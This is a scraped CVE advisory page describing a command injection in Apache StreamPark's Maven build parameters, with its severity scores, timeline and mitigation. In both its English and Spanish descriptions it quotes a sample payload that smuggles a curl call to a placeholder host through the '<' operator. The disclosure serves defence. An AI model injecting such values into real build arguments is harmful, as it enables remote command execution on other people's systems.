CVE-2023-52291

Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution

Severity Score

4.7

*CVSS v3.1

Exploit Likelihood

*EPSS

Affected Versions

*CPE

Public Exploits

*Multiple Sources

Exploited in Wild

*KEV

Decision

Track*

*SSVC

Descriptions

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.

Background:

In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection,

Mitigation:

all users should upgrade to 2.1.4, The "<" operator will blocked。

En Streampark, el módulo del proyecto integra las capacidades de compilación de Maven. La validación de los parámetros de entrada no es estricta, lo que permite a los atacantes insertar comandos para la ejecución remota de comandos. El requisito previo para un ataque exitoso es que el usuario debe iniciar sesión en el sistema Streampark y tener permisos a nivel de sistema. Generalmente, sólo los usuarios de ese sistema tienen autorización para iniciar sesión y los usuarios no ingresarían manualmente un comando de operación peligroso. Por tanto, el nivel de riesgo de esta vulnerabilidad es muy bajo. Antecedentes: en el módulo "Proyecto", el operador maven build args “<” provoca la inyección de comandos. Por ejemplo: “< (curl http://xxx.com)” se ejecutará como una inyección de comando. Mitigación: todos los usuarios deben actualizar a 2.1.4. El operador "<" se bloqueará.

*Credits: thiscodecc of MoyunSec Vlab and Bing

Attack Vector

Network

Attack Complexity

Low

Privileges Required

High

User Interaction

None

Scope

Unchanged

Confidentiality

Low

Integrity

Low

Availability

Low

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

Required

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

* Common Vulnerability Scoring System

SSVC

Decision:Track*

Exploitation

None

Automatable

Tech. Impact

Total

* Organization's Worst-case Scenario

Timeline

2023-12-31 CVE Reserved
2024-07-17 CVE Published
2024-08-02 CVE Updated
2024-08-19 EPSS Updated
---------- Exploited in Wild
---------- KEV Due Date
---------- First Exploit

CWE

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')

CAPEC

References (2)

URL	Tag	Source
http://www.openwall.com/lists/oss-security/2024/07/17/1	Mailing List

URL	Date	SRC

URL	Date	SRC

URL	Date	SRC
https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf	2024-07-22

Affected Vendors, Products, and Versions

Vendor		Product				Version		Other		Status
Vendor	Product	Version	Other	Status	<-- -->	Vendor	Product	Version	Other	Status
Apache Search vendor "Apache"		Streampark Search vendor "Apache" for product "Streampark"				>= 2.0.0 < 2.1.4 Search vendor "Apache" for product "Streampark" and version " >= 2.0.0 < 2.1.4"		-		Affected